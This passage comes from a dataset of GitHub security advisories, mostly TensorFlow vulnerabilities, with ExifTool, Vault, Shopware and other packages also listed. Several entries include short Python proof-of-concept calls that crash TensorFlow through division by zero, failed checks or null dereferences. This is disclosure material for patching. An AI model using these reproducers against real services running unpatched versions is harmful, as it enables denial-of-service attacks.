[`GeneratePoolingSequence`](https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_pool_common.cc#L100-L108). There, the first computation is a division in a modulo operation: + +```cc +std::vector GeneratePoolingSequence(int input_length, int output_length, + GuardedPhiloxRandom* generator, + bool pseudo_random) { + ... + if (input_length % output_length == 0) { + diff = std::vector(output_length, input_length / output_length); + } + ... +} +``` + +Since `output_length` can be 0, this results in runtime crashing. + +### Patches +We have patched the issue in GitHub commit [548b5eaf23685d86f722233d8fbc21d0a4aecb96](https://github.com/tensorflow/tensorflow/commit/548b5eaf23685d86f722233d8fbc21d0a4aecb96). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-f78g-q7r4-9wcv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29550'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/548b5eaf23685d86f722233d8fbc21d0a4aecb96'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:21:40Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-4whq-r978-2x68,2021-10-08T21:20:43Z,2021-05-04T17:43:52Z,,[],Arbitrary code execution in ExifTool,"### Impact + +Arbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads. + +### Patches + +ExifTool has already been patched in version 12.24. exiftool-vendored, which vendors ExifTool, includes this patch in v14.3.0. + +### Workarounds + +No. + +### References + +https://twitter.com/wcbowling/status/1385803927321415687 +https://nvd.nist.gov/vuln/detail/CVE-2021-22204 + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [exiftool-vendored](https://github.com/photostructure/exiftool-vendored.js) + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'exiftool-vendored'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/photostructure/exiftool-vendored.js/security/advisories/GHSA-4whq-r978-2x68'}, {'type': 'PACKAGE', 'url': 'https://github.com/photostructure/exiftool-vendored.js'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T17:33:25Z', 'nvd_published_at': None}" +1.4.0,GHSA-9c84-4hx6-xmm4,2021-05-17T22:31:02Z,2021-05-21T14:28:08Z,,['CVE-2021-29601'],Integer overflow in TFLite concatentation,"### Impact +The TFLite implementation of concatenation is [vulnerable to an integer overflow issue](https://github.com/tensorflow/tensorflow/blob/7b7352a724b690b11bfaae2cd54bc3907daf6285/tensorflow/lite/kernels/concatenation.cc#L70-L76): + +```cc +for (int d = 0; d < t0->dims->size; ++d) { + if (d == axis) { + sum_axis += t->dims->data[axis]; + } else { + TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); + } +} +``` + +An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of `int`. TFLite uses `int` to represent tensor dimensions, whereas TF uses `int64`. Hence, valid TF models can trigger an integer overflow when converted to TFLite format. + +### Patches +We have patched the issue in GitHub commit [4253f96a58486ffe84b61c0415bb234a4632ee73](https://github.com/tensorflow/tensorflow/commit/4253f96a58486ffe84b61c0415bb234a4632ee73). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9c84-4hx6-xmm4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29601'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4253f96a58486ffe84b61c0415bb234a4632ee73'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:31:02Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-8vv3-jxm8-f4vf,2021-05-05T21:19:56Z,2021-05-06T17:29:25Z,,['CVE-2020-7706'],Prototype Pollution in connie-lang,The package connie-lang before 0.1.1 are vulnerable to Prototype Pollution in the configuration language library used by connie.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'connie-lang'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7706'}, {'type': 'WEB', 'url': 'https://github.com/mattinsler/connie-lang/commit/ef376d404c712dd28309ba07f28a8f87f24a015a'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CONNIELANG-598853'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T21:19:56Z', 'nvd_published_at': '2020-08-18T10:15:00Z'}" +1.4.0,GHSA-25xj-89g5-fm6h,2022-02-24T13:07:50Z,2021-05-18T18:21:09Z,,['CVE-2020-13223'],Information Disclosure in HashiCorp Vault,"HashiCorp Vault and Vault Enterprise before 1.3.6, and 1.4.2 before 1.4.2, insert Sensitive Information into a Log File.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault/command'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault/command'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13223'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/commit/87f47c216cf1a28f4054b80cff40de8c9e00e36c'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/commit/e52f34772affb69f3239b2cdf6523cb7cfd67a92'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#142-may-21st-2020'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/vault/'}]","{'cwe_ids': ['CWE-200', 'CWE-532'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T14:30:01Z', 'nvd_published_at': '2020-06-10T19:15:00Z'}" +1.4.0,GHSA-rj5f-7c8x-gjg4,2021-05-05T18:14:15Z,2021-05-06T18:26:07Z,,['CVE-2020-7723'],Prototype Pollution in promisehelpers,All versions of package promisehelpers up to and including version 0.0.5 are vulnerable to Prototype Pollution via the insert function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'promisehelpers'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7723'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PROMISEHELPERS-598686'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T18:14:15Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-jhq9-wm9m-cf89,2021-05-18T21:12:05Z,2021-05-21T14:23:48Z,,['CVE-2021-29552'],CHECK-failure in `UnsortedSegmentJoin`,"### Impact +An attacker can cause a denial of service by controlling the values of `num_segments` tensor argument for `UnsortedSegmentJoin`: + +```python +import tensorflow as tf + +inputs = tf.constant([], dtype=tf.string) +segment_ids = tf.constant([], dtype=tf.int32) +num_segments = tf.constant([], dtype=tf.int32) +separator = '' + +tf.raw_ops.UnsortedSegmentJoin( + inputs=inputs, segment_ids=segment_ids, + num_segments=num_segments, separator=separator) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/a2a607db15c7cd01d754d37e5448d72a13491bdb/tensorflow/core/kernels/unsorted_segment_join_op.cc#L92-L93) assumes that the `num_segments` tensor is a valid scalar: + +```cc +const Tensor& num_segments_tensor = context->input(2); +auto num_segments = num_segments_tensor.scalar()(); +``` + +Since the tensor is empty the `CHECK` involved in `.scalar()()` that checks that the number of elements is exactly 1 will be invalidated and this would result in process termination. + +### Patches +We have patched the issue in GitHub commit [704866eabe03a9aeda044ec91a8d0c83fc1ebdbe](https://github.com/tensorflow/tensorflow/commit/704866eabe03a9aeda044ec91a8d0c83fc1ebdbe). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-jhq9-wm9m-cf89'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29552'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/704866eabe03a9aeda044ec91a8d0c83fc1ebdbe'}]","{'cwe_ids': ['CWE-617'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:12:05Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-6f84-42vf-ppwp,2021-05-18T23:07:43Z,2021-05-21T14:22:02Z,,['CVE-2021-29528'],Division by 0 in `QuantizedMul`,"### Impact +An attacker can trigger a division by 0 in `tf.raw_ops.QuantizedMul`: + +```python +import tensorflow as tf + +x = tf.zeros([4, 1], dtype=tf.quint8) +y = tf.constant([], dtype=tf.quint8) +min_x = tf.constant(0.0) +max_x = tf.constant(0.0010000000474974513) +min_y = tf.constant(0.0) +max_y = tf.constant(0.0010000000474974513) + +tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/55900e961ed4a23b438392024912154a2c2f5e85/tensorflow/core/kernels/quantized_mul_op.cc#L188-L198) does a division by a quantity that is controlled by the caller: + +```cc +template +void VectorTensorMultiply(const T* vector_data, int32 vector_offset, + int64 vector_num_elements, const T* tensor_data, + int32 tensor_offset, int64 tensor_num_elements, + Toutput* output) { + for (int i = 0; i < tensor_num_elements; ++i) { + const int64 vector_i = i % vector_num_elements; + ... + } +} +``` + +### Patches +We have patched the issue in GitHub commit [a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6](https://github.com/tensorflow/tensorflow/commit/a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6f84-42vf-ppwp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29528'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:07:43Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-4vrf-ff7v-hpgr,2021-05-17T22:34:57Z,2021-05-21T14:27:51Z,,['CVE-2021-29596'],Division by zero in TFLite's implementation of `EmbeddingLookup`,"The implementation of the `EmbeddingLookup` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/e4b29809543b250bc9b19678ec4776299dd569ba/tensorflow/lite/kernels/embedding_lookup.cc#L73-L74): + +```cc +const int row_size = SizeOfDimension(value, 0); +const int row_bytes = value->bytes / row_size; +``` + +An attacker can craft a model such that the first dimension of the `value` input is 0. + +### Patches +We have patched the issue in GitHub commit [f61c57bd425878be108ec787f4d96390579fb83e](https://github.com/tensorflow/tensorflow/commit/f61c57bd425878be108ec787f4d96390579fb83e). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4vrf-ff7v-hpgr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29596'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f61c57bd425878be108ec787f4d96390579fb83e'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:34:57Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-f6p7-8xfw-fjqq,2021-05-18T16:08:07Z,2021-05-21T14:29:26Z,,[],Authenticated Stored XSS in Administration,"### Impact +Authenticated Stored XSS in Administration + +### Patches +We recommend updating to the current version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview. + +For older versions you can use the Security Plugin: +https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html + + +### References +https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-05-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.6.9'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-f6p7-8xfw-fjqq'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-05-2021'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T16:08:07Z', 'nvd_published_at': None}" +1.4.0,GHSA-rmh2-65xw-9m6q,2023-02-07T20:02:24Z,2021-05-18T18:26:25Z,,['CVE-2020-10675'],Infinite Loop in jsonparser,The Library API in buger jsonparser through 2019-12-04 allows attackers to cause a denial of service (infinite loop) via a Delete call.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/buger/jsonparser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10675'}, {'type': 'WEB', 'url': 'https://github.com/buger/jsonparser/issues/188'}, {'type': 'WEB', 'url': 'https://github.com/buger/jsonparser/pull/192'}, {'type': 'WEB', 'url': 'https://github.com/buger/jsonparser/commit/91ac96899e492584984ded0c8f9a08f10b473717'}, {'type': 'PACKAGE', 'url': 'https://github.com/buger/jsonparser'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4C7PV6KEUUM76V4B2J5IFN2U6LEOWB67/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6KUHKDQSEYJNROA66OMN6AAQMGAAN6WI/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0089'}]","{'cwe_ids': ['CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T21:51:17Z', 'nvd_published_at': '2020-03-19T14:15:00Z'}" +1.4.0,GHSA-3h29-52vh-pqgr,2022-10-07T20:39:59Z,2021-05-07T15:53:48Z,,['CVE-2020-1950'],Uncontrolled Resource Consumption in Apache Tika,A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser in versions 1.0-1.23.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tika:tika'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.24'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.23'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1950'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tika'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r463b1a67817ae55fe022536edd6db34e8f9636971188430cbcf8a8dd%40%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00035.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4564-1/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T22:51:14Z', 'nvd_published_at': '2020-03-23T14:15:00Z'}" +1.4.0,GHSA-452g-f7fp-9jf7,2021-05-18T23:42:09Z,2021-05-21T14:20:46Z,,['CVE-2021-29513'],Type confusion during tensor casts lead to dereferencing null pointers,"### Impact +Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. + +There are multiple ways to reproduce this, listing a few examples here: + +```python +import tensorflow as tf +import numpy as np +data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) +``` + +```python +import tensorflow as tf +import numpy as np +data = +tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) +``` + +```python +import tensorflow as tf +import numpy as np +data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) +``` + +```python +import tensorflow as tf +import numpy as np +data = tf.range(start=np.int32(214),limit=660,delta=129,dtype=20) +``` + +```python +import tensorflow as tf +import numpy as np +data = tf.raw_ops.ResourceCountUpTo(resource=np.int32(30), limit=872, T=3) +``` + +```python +import tensorflow as tf +import numpy as np + +writer_array = np.array([1,2],dtype=np.int32) +writer_tensor = tf.convert_to_tensor(writer_array,dtype=tf.resource) +``` + +All these examples and similar ones have the same behavior: the [conversion from Python array to C++ 